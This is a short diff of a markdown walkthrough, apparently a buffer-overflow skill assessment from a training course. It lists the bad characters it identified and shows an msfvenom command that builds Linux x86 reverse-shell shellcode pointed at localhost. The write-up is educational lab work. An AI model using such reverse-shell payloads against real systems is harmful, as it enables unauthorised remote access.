B1rby/Stack-Based-Buffer-Overflows/Skill Asessment.md

 Finally the bad characters are `\x00` (which is always a bad character) & `x09`  & `x0a` & `\x20`

 #### Generating our shellcode
-Now that we have idenfify the bad characters we can generate our shellcode.
+Now that we have idenfify the bad characters, we can generate our shellcode.
 ```nasm
 └─# msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=4444 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
 Found 11 compatible encoders